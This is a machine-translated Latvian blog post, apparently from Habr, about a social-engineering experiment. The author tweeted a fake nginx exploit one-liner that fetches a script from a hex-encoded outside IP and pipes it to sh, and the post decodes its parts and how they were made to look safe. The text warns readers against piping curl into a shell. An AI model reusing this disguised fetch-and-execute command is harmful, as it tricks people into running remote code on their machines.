Sociālā eksperimenta panākumi ar viltotu nginx izmantošanu

Piezīme. tulk.: Autors oriģinālajā piezīmē, kas publicēta 1. jūnijā, nolēma veikt eksperimentu informācijas drošības interesentu vidū. Lai to izdarītu, viņš sagatavoja viltotu izmantošanu neatklātai tīmekļa servera ievainojamībai un ievietoja to savā Twitter. Viņa pieņēmumi – uzreiz tikt atmaskoti no speciālistiem, kuri saskatītu kodā acīmredzamo maldināšanu – ne tikai nepiepildījās... Tie pārspēja visas cerības, turklāt pretējā virzienā: tvīts saņēma milzīgu atbalstu no neskaitāmiem cilvēkiem, kuri to nedarīja. pārbaudiet tā saturu.

TL;DR: nekādā gadījumā neizmantojiet failu konveijeru sh vai bash. Tas ir lielisks veids, kā zaudēt kontroli pār datoru.

Es vēlos dalīties ar jums īsu stāstu par komisku PoC izmantošanu, kas tika izveidots 31. maijā. Viņš nekavējoties parādījās, reaģējot uz ziņām no Alisa Esage Ševčenko, biedrs Nulles dienas iniciatīva (ZDI), drīzumā tiks atklāta informācija par NGINX ievainojamību, kas noved pie RCE (attālās koda izpildes). Tā kā NGINX darbojas daudzās vietnēs, ziņām noteikti bija sprādziens. Taču “atbildīgas izpaušanas” procesa aizkavēšanās dēļ notikušā informācija nebija zināma – tā ir standarta ZDI procedūra.

čivināt par ievainojamības atklāšanu NGINX

Pabeidzis darbu pie jaunas apmulsināšanas tehnikas lokā, es citēju oriģinālo tvītu un “noplūdu strādājošu PoC”, kas sastāv no vienas koda rindiņas, kas it kā izmanto atklāto ievainojamību. Protams, tas bija pilnīgs absurds. Pieņēmu, ka uzreiz tikšu atmaskota, un labākajā gadījumā dabūšu pāris retvītus (o labi).

čivināt ar viltus izmantošanu

Tomēr es nevarēju iedomāties, kas notika tālāk. Mana tvīta popularitāte strauji pieauga. Pārsteidzoši, ka šobrīd (15:00 pēc Maskavas laika, 1. jūnijā) daži cilvēki ir sapratuši, ka tas ir viltojums. Daudzi cilvēki to retvīto, to nemaz nepārbaudot (nemaz nerunājot par skaisto ASCII grafiku, ko tas izvada).

Paskatieties, cik tas ir skaisti!

Lai gan visas šīs cilpas un krāsas ir lieliskas, ir skaidrs, ka cilvēkiem bija jāpalaiž savā datorā kods, lai tos redzētu. Par laimi, pārlūkprogrammas darbojas tāpat, un apvienojumā ar faktu, ka es īsti nevēlējos iekļūt juridiskās nepatikšanās, manā vietnē apraktais kods tikai veica atbalss zvanus, nemēģinot instalēt vai izpildīt papildu kodu.

Neliela novirze: netspooky, DNZ, es un citi puiši no komandas Thugcrowd Mēs jau kādu laiku esam spēlējuši ar dažādiem veidiem, kā aptumšot čokurošanās komandas, jo tas ir forši... un mēs esam gīki. netspooky un dnz atklāja vairākas jaunas metodes, kas man šķita ārkārtīgi daudzsološas. Es pievienojos jautrībai un mēģināju triku somai pievienot IP decimāldaļas reklāmguvumus. Izrādās, ka IP var arī pārvērst heksadecimālā formātā. Turklāt čokurošanās un vairums citu NIX rīku ar prieku ēd heksadecimālo IP! Tātad bija tikai jāizveido pārliecinoša un droša izskata komandrinda. Galu galā es pieņēmu šo:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Sociāli elektroniskā inženierija (SEE) — vairāk nekā tikai pikšķerēšana

Drošība un zināšanas bija šī eksperimenta galvenā sastāvdaļa. Es domāju, ka tie ir tie, kas noveda pie viņa panākumiem. Komandrinda skaidri norādīja uz drošību, atsaucoties uz "127.0.0.1" (labi zināms localhost). Localhost tiek uzskatīts par drošu, un tajā esošie dati nekad neatstāj jūsu datoru.

Iepazīšanās bija otra galvenā SEE sastāvdaļa eksperimentā. Tā kā mērķauditorija galvenokārt sastāvēja no cilvēkiem, kuri pārzina datoru drošības pamatus, bija svarīgi izveidot kodu tā, lai tā daļas liktos pazīstamas un pazīstamas (un līdz ar to drošas). Veco ekspluatācijas koncepciju elementu aizņemšanās un neparastā apvienošana ir izrādījusies ļoti veiksmīga.

Tālāk ir sniegta detalizēta viena starplikas analīze. Viss šajā sarakstā valkā kosmētiskais raksturs, un tā faktiskai darbībai praktiski nekas nav vajadzīgs.

Kādi komponenti patiešām ir nepieciešami? Šis -gsS, -O 0x0238f06a, |sh un pats tīmekļa serveris. Tīmekļa serveris nesaturēja nekādus ļaunprātīgus norādījumus, bet vienkārši apkalpoja ASCII grafiku, izmantojot komandas echo ietvertajā skriptā index.html. Kad lietotājs ievadīja rindiņu ar |sh vidū, index.html ielādēts un izpildīts. Par laimi, tīmekļa servera glabātājiem nebija ļaunu nodomu.

• ../../../%00 — attēlo, kas pārsniedz direktoriju;
• ngx_stream_module.so — ceļš uz nejaušu NGINX moduli;
• /bin/sh%00<'protocol:TCP' - mēs it kā palaižam /bin/sh mērķa mašīnā un novirzīt izvadi uz TCP kanālu;
• -O 0x0238f06a#PLToffset - slepena sastāvdaļa, papildināta #PLToffset, lai izskatās kā atmiņas nobīde, kas kaut kādā veidā ietverta PLT;
• |sh; - vēl viens svarīgs fragments. Mums vajadzēja novirzīt izvadi uz sh/bash, lai izpildītu kodu, kas nāk no uzbrūkošā tīmekļa servera, kas atrodas 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - manekens, uz kuru attiecas netcat /dev/tcp/localhostlai viss atkal izskatās droši. Patiesībā tas neko nedara un ir iekļauts skaistuma rindā.

Ar to tiek pabeigta vienas rindas skripta atšifrēšana un diskusija par “sociāli elektroniskās inženierijas” (sarežģītas pikšķerēšanas) aspektiem.

Web servera konfigurācija un pretpasākumi

Tā kā lielākā daļa manu abonentu ir infosec/hakeri, es nolēmu padarīt tīmekļa serveri nedaudz izturīgāku pret viņu “intereses” izpausmēm, lai puišiem būtu ko darīt (un tas būtu jautri uzstādīt). Es šeit neuzskaitīšu visas nepilnības, jo eksperiments joprojām turpinās, taču šeit ir dažas lietas, ko serveris dara:

• Aktīvi uzrauga izplatīšanas mēģinājumus noteiktos sociālajos tīklos un aizstāj dažādus priekšskatījuma sīktēlus, lai mudinātu lietotāju noklikšķināt uz saites.
• Tā vietā, lai rādītu čaulas skriptu, tiek novirzīts pārlūks Chrome/Mozilla/Safari/u.c. uz Thugcrowd reklāmas videoklipu.
• Novēro, vai nav APKLĀJAMĀS ielaušanās/neskaidra uzlaušanas pazīmju, un pēc tam sāk pāradresēt pieprasījumus uz NSA serveriem (ha!).
• Instalē Trojas zirgu, kā arī BIOS saknes komplektu visos datoros, kuru lietotāji apmeklē saimniekdatoru no parastās pārlūkprogrammas (joks!).

Neliela daļa antimēru

Šajā gadījumā mans vienīgais mērķis bija apgūt dažas Apache funkcijas, jo īpaši foršos pieprasījumu pāradresācijas noteikumus, un es domāju: kāpēc gan ne?

NGINX Exploit (īsts!)

Abonēt @alisaesage Twitter un sekojiet līdzi ZDI lieliskajam darbam, novēršot ļoti reālas ievainojamības un izmantojot iespējas NGINX. Viņu darbs mani vienmēr ir fascinējis, un es esmu pateicīgs Alisei par viņas pacietību ar visiem pieminējumiem un paziņojumiem, ko izraisīja mans muļķīgais tvīts. Par laimi, tas arī sniedza zināmu labumu: tas palīdzēja palielināt izpratni par NGINX ievainojamībām, kā arī problēmām, ko izraisīja čokurošanās ļaunprātīga izmantošana.

Avots: www.habr.com